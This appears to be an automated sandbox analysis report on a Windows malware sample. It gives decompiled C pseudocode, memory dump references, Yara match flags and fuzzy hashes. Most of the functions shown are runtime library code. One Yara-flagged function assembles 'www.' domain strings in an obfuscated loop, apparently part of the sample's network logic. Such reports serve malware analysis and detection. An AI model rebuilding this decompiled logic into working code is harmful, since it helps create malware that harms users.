                            • IsDebuggerPresent.KERNEL32 ref: 0132952B
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01329540
                            • UnhandledExceptionFilter.KERNEL32(0132CA38), ref: 0132954B
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 01329567
                            • TerminateProcess.KERNEL32(00000000), ref: 0132956E
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: dc96b0040fa0f0c9fad60ba0d7235aa29d4ae7318c37b4e58f64ef8a376baa9d
                            • Instruction ID: fd63e98e6d297a92027ca4b481c7d7d551dc6c967760522bfe12cd789a5f2b6e
                            • Opcode Fuzzy Hash: dc96b0040fa0f0c9fad60ba0d7235aa29d4ae7318c37b4e58f64ef8a376baa9d
                            • Instruction Fuzzy Hash: AF21BFB4801218DFD779EF69E4466583BECFB08B45F60501AF5098B348E7B4A981CF89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00417D32 Relevance: 4.1, Strings: 3, Instructions: 324COMMON
                            Download Yara Rule
                            C-Code - Quality: 69%
                            			E00417D32(void* __eax, void* __ebx, void* __edi, signed int __esi) {
				signed int _t135;
				char _t136;
				void* _t146;
				signed int _t151;
				intOrPtr _t166;
				intOrPtr _t210;
				char _t215;
				void* _t270;
				char _t276;
				intOrPtr _t277;
				void* _t282;
				void* _t283;
				signed int _t289;
				void* _t292;

				asm("lds ecx, [esi]");
				asm("out dx, al");
				asm("aam 0x39");
				asm("popfd");
				asm("rcl dword [eax], 0x9d");
				asm("aad 0x4c");
				_t289 = 0x2fdbfe78 ^  *(__edi - 0x3cb7436c);
				_t282 = __eax -  *((intOrPtr*)(__edi - 0x60));
				asm("in eax, dx");
				asm("bound esp, [edi+0x5c]");
				asm("invalid");
				asm("o16 sahf");
				_t135 = (__esi | 0xd09491ed) ^ 0xa05b7bb4;
				if(_t135 >= 0) {
					asm("rol byte [ebx+0x45c60cc4], 0xf0");
					 *0xFFFFFFFF8966F203 =  *((intOrPtr*)(0xffffffff8966f203)) + 0xbe;
					_t283 = _t282 + 1;
					asm("cmc");
					 *(_t283 - 9) = _t135;
					_t276 = 0;
					__eflags = 0;
					do {
						_t136 = E0040A470(__eflags, 0x4e, 0x8d);
						_t289 = _t289 + 8;
						_t215 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t136 -  *((intOrPtr*)(_t283 + _t215 - 0x10));
							if(_t136 ==  *((intOrPtr*)(_t283 + _t215 - 0x10))) {
								goto L8;
							}
							_t215 = _t215 + 1;
							__eflags = _t215 - _t276;
							if(_t215 <= _t276) {
								continue;
							} else {
								__eflags = _t136;
								if(_t136 != 0) {
									 *((char*)(_t283 + _t276 - 0x10)) = _t136;
									_t276 = _t276 + 1;
									__eflags = _t276;
								}
							}
							goto L8;
						}
						L8:
						__eflags = _t276 - 8;
					} while (__eflags < 0);
					 *((intOrPtr*)(_t283 - 8)) = 0x2e777777;
					 *((char*)(_t283 - 4)) = 0;
					 *((short*)(_t283 - 3)) = 0;
					 *((char*)(_t283 - 1)) = 0;
					 *((char*)(_t283 - 0x98)) = 0;
					E0041BE20(_t283 - 0x97, 0, 0x3f);
					_push(E0040A470(__eflags, 2, 5) & 0x000000ff);
					_push(_t283 - 0x98);
					E0041C6D0();
					 *((char*)(_t283 + E0041C070(_t283 - 0x98) - 0x98)) = 0x3d;
					_push(E0040A470(__eflags, 4, 0x10) & 0x000000ff);
					_push(_t283 + E0041C070(_t283 - 0x98) - 0x98);
					_t146 = E0041C6D0();
					_t31 = _t283 + 8; // 0x2e777777
					_t277 =  *_t31;
					_t210 = 0;
					_t292 = _t289 + 0x34;
					 *((intOrPtr*)(_t283 - 0x14)) = 0;
					_t270 = 0;
					do {
						__eflags =  *((intOrPtr*)(_t277 + 0x1160)) - _t210;
						if( *((intOrPtr*)(_t277 + 0x1160)) != _t210) {
							E0041BDD0(_t283 - 0x58, 0x2e);
							 *((short*)(_t283 - 0x308)) = 0;
							E0041BE20(_t283 - 0x306, 0, 0x206);
							E0041BDD0( *((intOrPtr*)(_t277 + 0x149c)) + _t270, 0x388);
							_t151 = E0041C390();
							_t39 = _t210 - 1; // -1
							 *( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x40) = _t151 * _t39 & 0x00000001;
							E0041BDA0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x87, _t283 - 0x98, E0041C070(_t283 - 0x98));
							_t47 = _t283 - 8; // 0x2e777777
							E0041BDA0(_t283 - 0x58, _t47, 4);
							_push(4);
							E0040AFA0(_t210, _t277, __eflags, _t277, _t283 + E0041C070(_t283 - 0x58) - 0x58,  *(_t283 + _t210 - 0x10) & 0x000000ff);
							E0041BDA0( *((intOrPtr*)(_t277 + 0x149c)) + _t270, _t283 - 0x58, E0041C070(_t283 - 0x58));
							_t166 = E0041C070(_t283 - 0x58);
							_t212 = _t277 + 0xe90;
							 *((intOrPtr*)(_t283 - 0x18)) = _t166;
							E0041C1A0(_t283 - 0x58, _t277 + 0xe90, 0);
							E00409E10(_t283 - 0x100);
							E0040AB60(_t283 - 0x100, _t283 - 0x58, E0041C070(_t283 - 0x58));
							E0040AB30(_t283 - 0x100);
							E0041BDA0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x72, _t283 - 0x100, 0x14);
							 *((char*)(_t283 +  *((intOrPtr*)(_t283 - 0x18)) - 0x58)) = 0;
							 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x4c)) = 2;
							 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x50)) = 1;
							E0040B030(_t277 + 0xe90, _t277, __eflags, _t277, _t283 - 0x308, 0x41, 1);
							E0041C440( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0xc7, _t283 - 0x308);
							E0040B030(_t277 + 0xe90, _t277, __eflags, _t277, _t283 - 0x308, 0x42, 1);
							E0041C440(E0041C070( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0xc7) +  *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0xc7, _t283 - 0x308);
							E0041C1A0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0xc7, _t283 - 0x58, 0);
							E0040B030(_t212, _t277, __eflags, _t277, _t283 - 0x308, 0x45, 1);
							E0041C440( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x167, _t283 - 0x308);
							E0040B030(_t212, _t277, __eflags, _t277, _t283 - 0x308, 0x46, 1);
							E0041C440(E0041C070( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x167) +  *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x167, _t283 - 0x308);
							E0041C1A0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x167, _t283 - 0x58, 0);
							E0040B030(_t212, _t277, __eflags, _t277, _t283 - 0x308, 0x4a, 1);
							__eflags = E0041C070( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287) +  *((intOrPtr*)(_t277 + 0x149c));
							E0041C440(E0041C070( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287) +  *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287, _t283 - 0x308);
							E0041C1A0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287, _t283 - 0x58, 0);
							_t146 = E0041C1A0( *((intOrPtr*)(_t277 + 0x149c)) + _t270 + 0x287, _t212, 0);
							_t210 =  *((intOrPtr*)(_t283 - 0x14));
							_t292 = _t292 + 0x144;
						}
						_t210 = _t210 + 1;
						_t270 = _t270 + 0x388;
						 *((intOrPtr*)(_t283 - 0x14)) = _t210;
						__eflags = _t270 - 0x1c40;
					} while (_t270 < 0x1c40);
					return _t146;
				} else {
					0x788c11f0();
					_pop(ss);
					asm("scasd");
					_push(__edi);
					return _t135;
				}
			}

















                            0x00417d32
                            0x00417d34
                            0x00417d37
                            0x00417d44
                            0x00417d45
                            0x00417d51
                            0x00417d5a
                            0x00417d60
                            0x00417d63
                            0x00417d64
                            0x00417d6c
                            0x00417d6e
                            0x00417d70
                            0x00417d75
                            0x00417dae
                            0x00417db5
                            0x00417dbb
                            0x00417dbc
                            0x00417dbd
                            0x00417dc0
                            0x00417dc0
                            0x00417dc2
                            0x00417dc9
                            0x00417dce
                            0x00417dd1
                            0x00417dd1
                            0x00417dd3
                            0x00417dd3
                            0x00417dd7
                            0x00000000
                            0x00000000
                            0x00417dd9
                            0x00417dda
                            0x00417ddc
                            0x00000000
                            0x00417dde
                            0x00417dde
                            0x00417de0
                            0x00417de2
                            0x00417de6
                            0x00417de6
                            0x00417de6
                            0x00417de0
                            0x00000000
                            0x00417ddc
                            0x00417de7
                            0x00417de7
                            0x00417de7
                            0x00417df8
                            0x00417dff
                            0x00417e03
                            0x00417e07
                            0x00417e0a
                            0x00417e10
                            0x00417e21
                            0x00417e28
                            0x00417e29
                            0x00417e3e
                            0x00417e51
                            0x00417e68
                            0x00417e69
                            0x00417e6e
                            0x00417e6e
                            0x00417e71
                            0x00417e73
                            0x00417e76
                            0x00417e79
                            0x00417e80
                            0x00417e80
                            0x00417e86
                            0x00417e92
                            0x00417ea6
                            0x00417ead
                            0x00417ec0
                            0x00417ec5
                            0x00417ed0
                            0x00417ed9
                            0x00417eff
                            0x00417f06
                            0x00417f0e
                            0x00417f1b
                            0x00417f30
                            0x00417f4c
                            0x00417f55
                            0x00417f5c
                            0x00417f67
                            0x00417f6a
                            0x00417f76
                            0x00417f90
                            0x00417f9f
                            0x00417fb8
                            0x00417fc6
                            0x00417fd5
                            0x00417fe5
                            0x00417fed
                            0x00418007
                            0x00418018
                            0x0041804b
                            0x00418064
                            0x00418075
                            0x0041808f
                            0x004180a0
                            0x004180d3
                            0x004180ec
                            0x004180fd
                            0x0041811f
                            0x00418130
                            0x00418149
                            0x0041815f
                            0x00418164
                            0x00418167
                            0x00418167
                            0x0041816a
                            0x0041816b
                            0x00418171
                            0x00418174
                            0x00418174
                            0x00418186
                            0x00417d77
                            0x00417d77
                            0x00417d7c
                            0x00417d7d
                            0x00417d7e
                            0x00417d89
                            0x00417d89

                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =$www.$www.
                            • API String ID: 0-3343787489
                            • Opcode ID: 8796de7e74906856ddb9612c52c7dee8710cbe4ccc7daeaa7db8a7b2532509b4
                            • Instruction ID: 651dae6f98f4df4358a4767328f329d86b8fd16b36b16a3c410919bef54c0669
                            • Opcode Fuzzy Hash: 8796de7e74906856ddb9612c52c7dee8710cbe4ccc7daeaa7db8a7b2532509b4
                            • Instruction Fuzzy Hash: 2EC1D576554348ABC714DBF0CCC2FEBB37CAF44708F00465EB6595B182DA78A688CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00417284 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e88be34466a8cc4249a800bb975a624229cd6a5aa22bb58552ad5f047246573a
                            • Instruction ID: 81de8bbdf3469b43227be3faf92764b7fdc0544f2859d087baa47713c334f41d
                            • Opcode Fuzzy Hash: e88be34466a8cc4249a800bb975a624229cd6a5aa22bb58552ad5f047246573a
                            • Instruction Fuzzy Hash: 4601422094968A8ADB039F699082792FBB5EF46BA0F4811ADCC90E7582D752C422C384
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00407B1A Relevance: .0, Instructions: 21COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afhjjq.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4263cbf3fc683bb1f62888b8560153c516afcffab3ccaf9dd81ea3a975a7dab4
                            • Instruction ID: 9a23272e15cd87e7d99fb6569f32b7fa32f1a186cbbe2e5b092c5b72b158dd18
                            • Opcode Fuzzy Hash: 4263cbf3fc683bb1f62888b8560153c516afcffab3ccaf9dd81ea3a975a7dab4
                            • Instruction Fuzzy Hash: ACD012337994280FEB114C487C416FCF779D7D3136F186267F808EB181C156C41652C8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01321000 Relevance: 12.1, APIs: 8, Instructions: 141stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01321000(void* __ebx, void* __ecx, void* __edi, void* __esi, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20) {
				intOrPtr _v8;

				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0) {
					return 0x57;
				} else {
					_v8 = E0132141A(_a4, 0x5c);
					if(_v8 == 0) {
						_v8 = E01321559(_a4, 0x40);
						if(_v8 == 0) {
							if(lstrlenW(_a4) <= _a12 - 1) {
								lstrcpyW(_a8, _a4);
								 *_a16 = 0;
								return 0;
							}
							return 0x7a;
						}
						if(_v8 + 2 - _a4 >> 1 <= _a12 - 1) {
							if(lstrlenW(_v8 + 2) <= _a20 - 1) {
								lstrcpyW(_a16, _v8 + 2);
								E01327760(__ebx, __edi, __esi, _a8, _a4, _v8 - _a4 >> 1 << 1);
								_a8[_v8 - _a4 >> 1] = 0;
								return 0;
							}
							return 0x7a;
						}
						return 0x7a;
					}
					if(_v8 - _a4 >> 1 <= _a20 - 1) {
						if(lstrlenW(_v8 + 2) <= _a12 - 1) {
							lstrcpyW(_a8, _v8 + 2);
							E01327760(__ebx, __edi, __esi, _a16, _a4, _v8 - _a4 >> 1 << 1);
							_a16[_v8 - _a4 >> 1] = 0;
							return 0;
						}
						return 0x7a;
					}
					return 0x7a;
				}
			}




                            0x01321008
                            0x00000000
                            0x0132102c
                            0x0132103a
                            0x01321041
                            0x013210d6
                            0x013210dd
                            0x0132116f
                            0x01321180
                            0x0132118b
                            0x00000000
                            0x0132118e
                            0x00000000
                            0x01321171
                            0x013210f2
                            0x01321113
                            0x01321127
                            0x01321140
                            0x01321155
                            0x00000000
                            0x01321159
                            0x00000000
                            0x01321115
                            0x00000000
                            0x013210f4
                            0x01321057
                            0x01321078
                            0x0132108f
                            0x013210a8
                            0x013210bd
                            0x00000000
                            0x013210c1
                            0x00000000
                            0x0132107a
                            0x00000000
                            0x01321059

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: lstrcpylstrlen$_wcschr_wcsrchr
                            • String ID:
                            • API String ID: 2287690931-0
                            • Opcode ID: c269b97b9905f15a49733a8c35e577445ffbc74541814b88d2834e78245f9eb7
                            • Instruction ID: ef007f0316f0161483825e7800360616755226c5e25d87c88738d12933986736
                            • Opcode Fuzzy Hash: c269b97b9905f15a49733a8c35e577445ffbc74541814b88d2834e78245f9eb7
                            • Instruction Fuzzy Hash: 30516371A00118EFCB24EF6CCA84BAE77B9EF84345F14C618F91A97344D634EA50CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01321660 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E01321660(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E01324360(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E01323ABB(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E01324360(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E013231DA(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E01323941(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E013242A5(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E013241A8(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E01324360(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E013231DA(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E013242D7(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E013231DA(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                            0x01321660
                            0x01321668
                            0x0132166c
                            0x01321671
                            0x01321673
                            0x01321676
                            0x0132167c
                            0x0132169f
                            0x00000000
                            0x01321683
                            0x01321683
                            0x01321685
                            0x013216a6
                            0x013216a9
                            0x013216ab
                            0x013216ba
                            0x013216ba
                            0x013216bd
                            0x013216c2
                            0x013216c7
                            0x013216c7
                            0x013216ca
                            0x013216cc
                            0x00000000
                            0x013216ce
                            0x013216ce
                            0x013216d3
                            0x013216d6
                            0x013216d9
                            0x00000000
                            0x00000000
                            0x013216db
                            0x013216de
                            0x013216e2
                            0x013216e9
                            0x013216ec
                            0x013216ee
                            0x013216f8
                            0x013216f0
                            0x013216f3
                            0x013216f3
                            0x013216ff
                            0x01321701
                            0x013217f1
                            0x00000000
                            0x01321707
                            0x01321707
                            0x01321707
                            0x0132170e
                            0x01321754
                            0x01321754
                            0x01321757
                            0x013217c2
                            0x013217c8
                            0x013217cb
                            0x01321856
                            0x00000000
                            0x0132185c
                            0x013217d1
                            0x013217d5
                            0x01321825
                            0x01321825
                            0x01321829
                            0x01321833
                            0x01321838
                            0x01321838
                            0x01321840
                            0x01321848
                            0x01321849
                            0x0132184a
                            0x0132184b
                            0x0132184c
                            0x01321697
                            0x01321697
                            0x00000000
                            0x0132169c
                            0x013217d7
                            0x013217da
                            0x013217dd
                            0x013217e2
                            0x013217e3
                            0x013217e3
                            0x013217e3
                            0x013217e6
                            0x00000000
                            0x013217e6
                            0x01321759
                            0x0132175d
                            0x0132177e
                            0x01321783
                            0x01321785
                            0x01321787
                            0x01321787
                            0x0132175f
                            0x01321766
                            0x01321768
                            0x01321775
                            0x01321775
                            0x01321775
                            0x01321778
                            0x0132176a
                            0x0132176c
                            0x0132176f
                            0x0132176f
                            0x0132177a
                            0x0132177a
                            0x01321789
                            0x0132178c
                            0x00000000
                            0x01321792
                            0x01321792
                            0x01321793
                            0x01321797
                            0x0132179c
                            0x0132179d
                            0x0132179e
                            0x013217a3
                            0x013217a6
                            0x013217a8
                            0x01321864
                            0x00000000
                            0x01321864
                            0x013217ae
                            0x013217b1
                            0x01321852
                            0x01321852
                            0x01321852
                            0x01321852
                            0x00000000
                            0x01321852
                            0x013217b7
                            0x013217ba
                            0x013217bc
                            0x00000000
                            0x013217bc
                            0x0132178c
                            0x01321710
                            0x01321713
                            0x01321715
                            0x00000000
                            0x00000000
                            0x01321717
                            0x00000000
                            0x00000000
                            0x0132171d
                            0x0132171f
                            0x01321721
                            0x01321723
                            0x01321723
                            0x01321725
                            0x01321728
                            0x013217f9
                            0x013217fb
                            0x013217ff
                            0x01321808
                            0x0132180d
                            0x0132180d
                            0x01321810
                            0x01321815
                            0x01321816
                            0x01321817
                            0x01321818
                            0x01321819
                            0x0132181f
                            0x00000000
                            0x0132172e
                            0x01321737
                            0x0132173c
                            0x0132173f
                            0x01321741
                            0x01321744
                            0x01321746
                            0x01321749
                            0x0132174c
                            0x0132174c
                            0x013217e9
                            0x013217e9
                            0x013217e9
                            0x00000000
                            0x01321707
                            0x01321701
                            0x013216cc
                            0x013216ad
                            0x013216b2
                            0x013216b2
                            0x013216b5
                            0x013216b8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013216b8
                            0x01321687
                            0x01321687
                            0x0132168c
                            0x0132168d
                            0x0132168e
                            0x0132168f
                            0x01321690
                            0x01321696
                            0x00000000
                            0x01321696

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.359821664.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000002.00000002.359811926.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359834986.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359847554.000000000132F000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000002.00000002.359857695.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: c2215165c55aaec1ce3bc15af05cc047e0c6a00bae43fdd925e0692e753908a1
                            • Instruction ID: e96bbc068a4b0a272071fa1099359a5fc9f98e34d0fb4b071410f6a255e94334
                            • Opcode Fuzzy Hash: c2215165c55aaec1ce3bc15af05cc047e0c6a00bae43fdd925e0692e753908a1
                            • Instruction Fuzzy Hash: 0D51F831A00229EFDB30BF6D8A4459EBFB9EF91338F188229E92556190D7719951CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013287EB Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E013287EB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x132d780);
				E01322A5C(__ebx, __edi, __esi);
				_t31 = E013252A2(__ebx, _t35);
				_t15 =  *0x132fd9c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E01321F64(_t25, _t29, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x132fba8; // 0x132f780
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x132f780;
								if(__eflags != 0) {
									_push(_t33);
									E0132567D(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x132fba8; // 0x132f780
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x132fba8; // 0x132f780
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E01328886();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E01322CAC(_t29, 0x20);
				}
				return E01322AA1(_t33);
			}











                            0x013287eb
                            0x013287eb
                            0x013287eb
                            0x013287eb
                            0x013287ed
                            0x013287f2
                            0x013287fc
                            0x013287fe
                            0x01328806
                            0x01328827
                            0x0132882d
                            0x01328831
                            0x01328834
                            0x01328837
                            0x0132883d
                            0x0132883f
                            0x01328841
                            0x01328844
                            0x0132884a
                            0x0132884c
                            0x0132884e
                            0x01328854
                            0x01328856
                            0x01328857
                            0x0132885c
                            0x01328854
                            0x0132884c
                            0x0132885d
                            0x01328862
                            0x01328865
                            0x0132886b
                            0x0132886f
                            0x0132886f
                            0x01328875
                            0x0132887c
                            0x0132880e
                            0x0132880e
                            0x0132880e
                            0x01328813
                            0x01328817
                            0x0132881c
                            0x01328824

